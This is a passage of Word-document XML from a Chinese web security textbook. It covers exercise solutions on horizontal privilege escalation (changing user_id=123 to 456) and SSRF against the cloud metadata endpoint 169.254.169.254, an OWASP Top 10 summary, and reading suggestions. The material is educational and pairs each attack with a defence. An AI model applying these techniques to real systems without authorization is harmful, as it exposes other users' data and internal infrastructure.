        </w:rPr>
        <w:t xml:space="preserve">user_id=123</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">改为</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">user_id=456</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">，成功查看用户</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> B </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的订单。违反的假设是“用户只会请求自己的数据”——后端仅验证了请求来自已登录用户，而未校验该用户的身份与所请求资源的归属关系是否匹配。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">习题</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> 8-3 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">解答</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：云环境中，服务器常被部署在可以访问内部服务与云实例元数据端点（如</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">169.254.169.254</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">）的网络上。当应用从用户提供的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> URL </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">获取资源而未做任何过滤时，攻击者可让服务器请求这些在其信任边界内的敏感端点。被违反的假设是“服务器只会访问用户可见的外部地址”——事实上，服务器在网络拓扑上具有更广泛的可达性，可被用作跳板进入内网。防御核心是建立严格的出站白名单，仅允许服务器请求预定义的、必须的外部资源。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">靶机迁移任务（自检性练习，不在本书解答）</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">打开</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> PortSwigger Web Security Academy </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的“SQL</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">injection”实验系列，选择任一非入门级实验，在代理拦截的配合下（Burp</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Suite，详见第</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 8.1 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">节），不使用自动化工具，手动构造注入载荷，提取隐藏数据。完成后切换至“Access</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">control”实验系列，复现一个水平越权场景。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">在同一平台上找出标记为“SSRF”的实验，尝试使用服务器向内部元数据端点发起请求。记录每一步中经</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Burp </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">代理观察到的请求与响应内容，并与</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> OWASP Top 10 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">中所描述的假设失效点对应。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="160"/>
    <w:bookmarkStart w:id="161" w:name="小结-11"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">8.2.3 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">小结</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1087"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">OWASP Top 10 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">是一张风险地图，不是一张检查表</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">。它凝聚了全球安全社区公认的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Web </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">应用安全风险类型，覆盖了从注入、访问控制到加密失败、SSRF、XSS/CSRF</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">到安全配置错误与日志监控的完整攻击面。本卷以此为框架，将每一类风险映射到后续专章中细致展开，并与</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 8.1 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">节的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Burp Suite </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">工具能力有机结合。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1087"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">每一类风险都对应着一个被违反的安全假设</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">。注入违反了“数据与代码可以被字符串拼接所分离”的假设；访问控制失效违反了“权限检查无处不在且默认拒绝”的假设；SSRF</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">违反了“服务器只访问预期外部资源”的假设；XSS</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">违反了“浏览器能区分代码与数据”的假设。攻防双方都应从这些第一性原理出发来思考问题，而非仅记忆</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> payload </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">列表。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1087"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">攻防必须对称</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">。本卷的体例要求——每一个攻击技术紧接一个防御对照框——扎根于</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> OWASP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的根本理念：知道如何攻，是为了知道如何防。防御不应由“不知道这种攻击存在”的团队来设计。OWASP</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Testing Guide </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">和</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> PortSwigger Web Security Academy </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">均为这种攻防对称学习提供了系统支持。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1087"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">防御的本质是修复假设</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">。参数化查询修复了注入的假设失效；Anti-CSRF</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Token </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">与</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SameSite </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">修复了</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> CSRF </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的假设失效；出站白名单修复了</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SSRF </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的假设失效；CSP</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">与输出编码修复了</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> XSS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的假设失效。没有一种防御是“魔法”，每一种都对应着在架构层面重新确立那条曾被打破的安全边界。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1087"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">纵深防御不可跳过配置与监控</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">。Top 10 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">中的安全配置错误与日志监控失败提醒我们：即便代码本身没有明显漏洞，不当的部署配置与缺失的事件可见性，依然可以导致整个应用沦陷。CIS</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Benchmarks </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">与</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> MITRE ATT&amp;CK </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的检测工程部分为蓝队提供了可操作的基线。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1087"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">本卷后续各章均以上述映射为导航</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">。读者可在学习每章前回溯本节的表格，明确该章所应对的核心风险类别与被违反的假设，从而在靶机实验和防御设计中始终保持全局视野。8.1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">节的代理拦截练习已为此提供了基本的“观察与干预”手段，两者结合将构成贯穿全书的渗透测试方法论。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="161"/>
    <w:bookmarkStart w:id="162" w:name="延伸阅读-4"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">8.2.4 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">延伸阅读</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">以下白名单阅读材料构成了</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Web </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">应用安全领域的公认核心文献与训练资源，本卷不重复已有内容，但强烈建议读者将其作为本卷学习的并行读物：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1088"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">OWASP Top </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">10（官方文档）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：完整的风险描述、示例场景、预防措施清单与参考链接。这是所有</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Web </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">安全从业者的必读基准文档。建议读者将本卷每一章与该文档中对应的风险条目交叉阅读。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1088"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">OWASP Testing Guide</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：覆盖了从信息收集、配置管理测试、身份认证测试、会话管理测试、输入验证测试到业务逻辑测试的完整方法论。本卷的靶机实操设计深受其“测试用例</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">预期结果</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">修复建议”结构的影响。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1088"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Stuttard–Pinto《The Web Application Hacker’s </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Handbook》（第二版）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：由</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Dafydd Stuttard </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">与</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Marcus Pinto </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">撰写，是</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Web </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">渗透测试领域的奠基性著作。书中对注入、XSS、CSRF、SSRF、逻辑漏洞等的分析深度与实用性至今无人能出其右。本卷第</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 9 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">至</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 11 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">章诸多攻击手法与其分析框架一脉相承。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1088"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">PortSwigger Web Security Academy</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：由</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Burp Suite </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">开发公司</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> PortSwigger </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">维护的免费互动式学习平台，提供近</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 300 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">个逐级递进的实验，覆盖</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SQL </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">注入、XSS、CSRF、SSRF、访问控制、反序列化、SSTI</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">等几乎全部</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> OWASP Top 10 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">风险类别。本卷</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 8.1 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">节已介绍</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Burp Suite </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">代理拦截，该平台实验正是将本节分类框架转化为交互式动手练习的最佳场所。建议读者在每个理论节学习后立即前往该平台完成对应主题的实验。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">以上四项资源与本书组成“理论—靶机—指南—练习”的完整闭环。读者应将</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> OWASP Top 10 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">与</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Testing Guide </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">作为理论参考框架，《Web</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Application Hacker’s </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Handbook》作为攻击思维深化读本，PortSwigger</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Web Security Academy </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">作为动手练习场，而将本卷各章的授权靶机实操单元作为将知识转化为能力的核心枢纽。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="162"/>
    <w:bookmarkEnd w:id="163"/>
    <w:bookmarkStart w:id="177" w:name="注入类sql-注入与命令注入"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">9 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">注入类:SQL</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">注入与命令注入</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ★</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="164" w:name="sql-注入原理与联合查询注入"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">9.1 SQL </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">注入原理与联合查询注入</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ★</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">[前置依赖框]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">阅读本节前，读者应已掌握《从位到物联》第</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 7 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">章</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> CM5 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">计算模块第</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 5 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">节（数论与</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> RSA </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">等，此处在</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SQL </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">注入不直接使用，但理解密码学“旁信道”思想对盲注有助益）、《从位到物联》第</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 24–28 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">章（以太网/ARP/IP/TCP/TLS</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">等，Web</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">安全的底层传输基础），以及本书第</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 2 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">章（靶场搭建：DVWA/SQLi-labs</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">环境）、第</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 8 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">章（HTTP</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">协议安全关键点、Burp</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Suite </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">代理拦截）。SQL</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">注入发生在</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> HTTP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
